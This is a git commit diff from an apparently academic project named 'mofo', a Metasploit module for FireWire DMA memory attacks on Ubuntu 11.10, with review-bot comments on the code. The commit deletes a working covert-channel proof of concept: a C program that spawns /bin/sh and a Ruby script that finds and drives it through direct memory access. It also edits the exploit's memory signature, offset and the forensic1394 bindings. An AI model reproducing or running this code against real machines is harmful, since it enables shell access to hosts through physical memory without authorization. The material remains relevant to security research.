
Added rough installation instructions

Removed some unused files
removed fu
commit 895172cadeebe2f81372310620dfa21c113d084d 1 parent 86761d7
dma authored
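--- a/README
+++ b/README
@@ -7,7 +7,7 @@ An explanation of our work can be found in our paper: "mofo-final.pdf".
 #### INSTALLATION INSTRUCTIONS ####
 #install prerequisites
-sudo apt-get install cmake
+sudo apt-get install cmake git build-essential
 # Fetch, build and install libforensic1394
 git clone git://git.freddie.witherden.org/forensic1394.git
@@ -20,8 +20,8 @@ cd ..
 # install ffi gem
 #TODO: there has got to be a better way
 sudo apt-get install ruby1.9.1-dev
-gem1.9.1 install ffi
-cp -r /var/lib/gems/1.9.1/gems/ffi-1.0.11 /opt/metasploit-4.1.4/ruby/lib/ruby/gems/1.9.1/gems/
+sudo gem1.9.1 install ffi
+sudo cp -r /var/lib/gems/1.9*/gems/ffi-1* /opt/metasploit-4*/ruby/lib/ruby/gems/1.9*/gems/
 # install mofo
 git clone git@github.com:mrbreaker/mofo.git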
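--- a/channel-poc/channel.c
+++ b/channel-poc/channel.c
@@ -1,102 +0,0 @@
-#include <sys/mman.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <stdbool.h>
-#include <unistd.h>
-#include <fcntl.h>
-#include <errno.h>
-
-#pragma pack(1)
-
-#define BUFFER_SIZE 255
-#define PATTERN_SIZE 16
-#define CACHE_SIZE ( 10 * 1024 * 1024 )
-#define SEND_MASTER '^'
-#define SEND_SLAVE '~'
-
-struct msg {
- char pattern[PATTERN_SIZE];
- volatile char flags;
- volatile unsigned char len;
- char data[BUFFER_SIZE];
-};
-typedef struct msg message;
-
-message* initMessage(){
- int i;
- message *p;
-
- p = mmap(NULL,sizeof(message),PROT_WRITE|PROT_READ,MAP_PRIVATE|MAP_ANONYMOUS,-1,0);
- if(p == (void*)-1)
- puts("mmap failed");
-
- memcpy(p->pattern,"81d2ec67g412df64",PATTERN_SIZE);
-
- for(i=0;i<PATTERN_SIZE;i++)
- p->pattern[i]-=1;
-
- p->flags = SEND_SLAVE;
- return p;
-}
-
-void blockMessage(message *m){
- while(1)
- if(m->flags != SEND_SLAVE)
- return;
-}
-
-int main(int argc,char **argv){
- int fdstdin[2];
- int fdstdout[2];
- int oldstdin;
- int oldstdout;
- message* m;
- m = initMessage();
- if(pipe(fdstdin))
- perror("creating pipe failed");
-
- if(pipe(fdstdout))
- perror("creating pipe failed");
-
- fcntl(fdstdin[0],F_SETFL,O_NONBLOCK);
- fcntl(fdstdin[1],F_SETFL,O_NONBLOCK);
- fcntl(fdstdout[0],F_SETFL,O_NONBLOCK);
- fcntl(fdstdout[1],F_SETFL,O_NONBLOCK);
-
- oldstdin=dup(fileno(stdin));
- close(fileno(stdin));
-
- oldstdout=dup(fileno(stdout));
- close(fileno(stdout));
-
- dup2(fdstdin[0], fileno(stdin));
- dup2(fdstdout[1], fileno(stdout));
-
- if(fork()){
- //parent
- dup2(oldstdin, fileno(stdin));
- dup2(oldstdout, fileno(stdout));
-
- while(1){
- int len;
- blockMessage(m);
- write(fdstdin[1], m->data, m->len);
- write(fileno(stdout), m->data, m->len);
- if ((len = read(fdstdout[0], m->data, BUFFER_SIZE)) == -1)
- m->len = 0;
- else
- m->len = len;
-
- m->flags = SEND_SLAVE;
- puts ("###################################");
- }
- }else{
- //child
- char *args = NULL;
- dup2(fileno(stdout), fileno(stderr));
- execvp("/bin/sh",&args);
- }
- return 0;
-}
-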
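--- a/channel-poc/channel.rb
+++ b/channel-poc/channel.rb
@@ -1,119 +0,0 @@
-#!/usr/bin/env ruby
-require '../forensic1394/bus'
-require 'pp'
-require 'fcntl'
-
-
-def run(context)
- # first 17 characters of md5sum of awesome with the 9 removed
- sig = "70c1db56f301ce55"
- off = 0x00
-
- # Print phase, method and patch parameters
- puts ' Using signature: %s' % sig
- puts ' Using offset: %x' % off
-
- # Initialize
- d = initialize_fw(d)
-
- # Find memory size
- puts 'Detecting memory size...'
- memsize = 4 * 1024 * 1024 * 1024
- puts '%d MiB main memory detected' % (Integer(memsize)/(1024 * 1024))
-
- # Attack
- puts 'Starting attack...'
- begin
- # Find
- addr = findsig(d, sig, off, memsize)
- if !addr
- settings.success = False
- else
- puts '+ Signature found at 0x%x.' % addr
- while (1)
- data = ''
- begin
- STDIN.flush
- data = STDIN.read_nonblock(255)
- rescue
- data = ''
- end
- d.write(addr + 18, data)
- d.write(addr + 17, sprintf("%c", data.length))
- d.write(addr + 16, '^')
- while (d.read(addr + 16, 1) != '~')
- sleep(1)
- end
- len = d.read(addr + 17, 1)
- data = d.read(addr + 18, len.ord)
- print data
- end
- end
- rescue IOError => e
- success = false
- puts '-', 'I/O Error, make sure FireWire interfaces are properly connected.'
- puts e.message
- end
-
- if !success
- fail('Failed to dump.')
- end
-
-
- if not settings.success
- fail('Signature not found.')
- end
-end
-
-def initialize_fw(d)
- b = Bus.new
- # Enable SBP-2 support to ensure we get DMA
- b.enable_sbp2()
-
- begin
- for i in 3.downto(1)
- puts "[+] Initializing bus and enabling SBP2, please wait %2d seconds or press Ctrl+C \r" % i;
- STDOUT.flush
- sleep(1)
- end
- rescue
- puts 'Interrupted'
- end
-
- # Open the first device
- d = b.devices
-
- if (d.length > 0)
- d = d[0]
- d.open()
- puts ''
- else
- raise 'nothing connected'
- end
-
- return d
-end
-
-def findsig(d, sig, off, memsize)
- pagesize = 4096
- one_mb = 1 * 1024 * 1024
- for addr in (one_mb + off..memsize).step(pagesize)
- data = d.read(addr, sig.length)
- if (data == sig)
- return addr
- end
- end
- print()
- return
-end
-
-def fail(msg)
- puts "\n [!] Attack unsuccessful."
- puts msg
- exit
-end
-
-if __FILE__ == $0
- run( ARGV )
-end
-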
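--- a/channel-poc/spam.c
+++ b/channel-poc/spam.c
@@ -1,11 +0,0 @@
-#include <string.h>
-#include <stdlib.h>
-
-int main(int argc,char** argv){
- char *ptr;
- char i;
- for(;;i++){
- ptr = malloc(16);
- memset(ptr,i,16);
- }
-}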
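--- a/forensic1394/device.rb
+++ b/forensic1394/device.rb
@@ -49,7 +49,7 @@ def initialize (bus, devptr)
 @vendor_id = Forensic1394.get_device_vendor_id(@devptr)
 @request_size = Forensic1394.get_device_request_size(@devptr)
- @csr = FFI::Buffer.new(4, 256, true)
+ @csr = FFI::MemoryPointer.new(4, 256, true)
 Forensic1394.get_device_csr(@devptr, @csr)
 end
@@ -68,7 +68,7 @@ def setStale(stale)
 # device is stale, an exception raised.
 def open
- checkStale()
+ checkStale
 process_result(Forensic1394.open_device(@devptr), 'Forensic1394.open_device')
 end
@@ -85,7 +85,7 @@ def close
 # Checks to see if the device is open or not, returning a boolean value.
 # In the case of a stale handle false is returned.
- def isOpen
+ def isopen
 if @stale
 return false
 else
@@ -98,18 +98,55 @@ def isOpen
 # The device must be open and the handle can not be stale.
 # Requests larger than @request_size will automatically be
 # broken down into smaller chunks. The resulting data is
- # returned.
+ # returned. An exception is raised should an error occur. The
+ # optional buf parameter can be used to pass a specific ctypes
+ # c_char array to read into. If no buffer is passed then
+ # create_string_buffer will be used to allocate one.
- def read (addr, numb)
+ def read (addr, numb, buf=nil)
+ if buf == nil
+ # No buffer passed; allocate one
+ buf = FFI::MemoryPointer.new(1, numb, true)
+ else
+ raise "IMPLEMENT ME"
+ end
+
 # Break the request up into rs size chunks; if numb % rs = 0 then
 # lens may have an extra element; zip will take care of this
 rs = @request_size
 addrs = (addr..addr + numb).step(rs)
 lens = [rs] * (Integer(numb) / Integer(rs)) + [numb % rs]
- return readreq(addrs.zip(lens))
- #buf = FFI::Buffer.new(1, numb, true)
- #readreq(addrs.zip(lens), buf)
- #return buf.get_bytes(0,numb)
+ readreq(addrs.zip(lens), buf)
+ return buf.get_bytes(0,numb)
+ end
+
+ ##
+ # Performs a batch of read requests of the form: [(addr1, len1),
+ # (addr2, len2), ...] and returns a generator yielding, in
+ # sequence, (addr1, buf1), (addr2, buf2), ..., . This is useful
+ # when performing a series of `scatter reads' from a device.
+
+ def readv (req)
+ checkStale()
+ # Create the request buffer
+ sum = 0
+ for addr, numb in req
+ sum += numb
+ end
+ buf = FFI::MemoryPointer.new(1, sum, true)
+
+ # Use readreq to read the requests into buf
+ readreq(req, buf)
+
+ # Generate the resulting buffers
+ off = 0
+ answers = []
+ for addr, numb in req
+ answers << [[addr, buf.get_pointer(off)]]
+ off += numb
+ end
+
+ return answers
 end
 ##
@@ -119,7 +156,7 @@ def read (addr, numb)
 # chunks. Uses writev internally.
 def write (addr, buf)
- checkStale()
+ checkStale
 # Break up the request
 req = []
 (0..buf.size).step(@request_size) do |off|
@@ -135,16 +172,15 @@ def write (addr, buf)
 def writev (req)
 checkStale()
- if isOpen() == 0
+ if isopen() == 0
 raise "Forensic1394Exception", "not open"
 end
 # Prepare the request array(addr, len, buf)
 for addr, buf in req
 creq = Forensic1394::Req.new()
- b = FFI::MemoryPointer.new(:char,buf.size);
- b.write_array_of_char(buf.to_s)
-
+ b = FFI::MemoryPointer.new(1, buf.size, true)
+ b.put_bytes(0, buf.to_s)
 creq[:addr]=addr
 creq[:len]=buf.size
 creq[:buf]= b
@@ -215,29 +251,24 @@ def csr
 ##
 # Internal low level read function.
- def readreq(req)
- if isOpen() == 0
+ def readreq (req, buf)
+ if isopen() == 0
 raise Forensic1394Exception, "not open"
 end
+ # Create the request tuples
 off = 0
- buf = ""
 for addr, numb in req
- #set up the struct for passing
 creq = Forensic1394::Req.new
 creq[:addr] = addr
 creq[:len]=numb
-
- b = FFI::MemoryPointer.new(:char,numb)
- creq[:buf]= b
-
- # Dispatch the request
+ creq[:buf]= buf.slice(off, numb)
+
+ # Dispatch the requests
 status = Forensic1394.read_device_v(@devptr, creq, 1)
- buff += b.read_array_of_char()
 process_result(status, "Forensic1394.read_device_v")
 off += numb
 end
- return buff
 end
 end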
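Review bot: In readv, `answers << [[addr, buf.get_pointer(off)]]` reads a pointer-sized value out of the bytes the device just wrote at `off` and hands that back as the sub-buffer, so callers receive a pointer assembled from device-supplied data rather than a view into `buf`, and the doubled brackets wrap each pair in a second array, contradicting the (addr1, buf1) shape the comment promises; `answers << [addr, buf.slice(off, numb)]` gives a bounded view the way readreq already does. The new doc comment on read talks about a "ctypes c_char array" and create_string_buffer, which are Python ctypes terms, while the Ruby code allocates an FFI::MemoryPointer and raises "IMPLEMENT ME" whenever a buffer is actually passed; the comment should say that only the nil case is implemented. readv also keeps `checkStale()` with parentheses while open and write in this same commit drop them. The `isopen() == 0` checks in writev and readreq only fire if isopen returns an Integer; its visible `@stale` branch returns `false`, which never equals 0, so the open check is worth confirming against the rest of isopen, which lies outside the hunk.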
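--- a/module/mofo.rb
+++ b/module/mofo.rb
@@ -29,7 +29,9 @@ def initialize(info = {})
 'Arch' => ARCH_X86,
 'Targets' =>
 [
- [ 'Ubuntu 11.10', { 'Offset' => 0x540, 'Signature' => "\x74\x1e\x89\x5c\x24\x04\xc7\x04\x24\x70\x73\x05\x08\xe8\x3e\x53\xff\xff\x83\xc4\x24\x31\xc0\x5b\x5e", 'Space' => 75 } ],
+ [ 'Ubuntu 11.10', { 'Offset' => 0x590, 'Signature' =>
+ # "\x74\x1e\x89\x5c\x24\x04\xc7\x04\x24\x70\x73\x05\x08\xe8\x3e\x53\xff\xff\x83\xc4\x24\x31\xc0\x5b\x5e", 'Space' => 75 } ],
+ "\x74\x1e\x89\x5c\x24\x04\xc7\x04\x24", 'Space' => 75 } ],
 # [ 'Ubuntu 11.10', { 'Offset' => 0x4f2, 'Signature' => "8B430C8B501C895424048B40", 'Space' => 75 } ],
 ],
 'DefaultTarget' => 0,
@@ -108,7 +110,7 @@ def initialize_fw(b, d)
 b.enable_sbp2()
 begin
- for i in 3.downto(1)
+ for i in 4.downto(1)
 puts "[+] Initializing bus and enabling SBP2, please wait %2d seconds or press Ctrl+C \r" % i;
 STDOUT.flush
 sleep(1)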
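Review bot: The old 25-byte signature is left as a commented-out line sitting between `'Signature' =>` and its new value inside the target hash literal, which is legal Ruby but easy to misread as the live value; drop it or move it above the `[ 'Ubuntu 11.10', …` entry next to the other commented target. Neither the Offset move from 0x540 to 0x590 nor the cut to a 9-byte signature is explained in the hunk or the commit message, and the new `'Offset'`/`'Signature'` pair is all a future reader has to tell which build the target matches; a comment such as `# Offset/Signature derived from <BUILD OR BINARY — fill in>; see the paper in README` above the entry would record that. The `for i in 4.downto(1)` loop in initialize_fw is more idiomatic as `4.downto(1) do |i|`, and the enclosing `initialize` and `initialize_fw` methods both start and end outside their hunks.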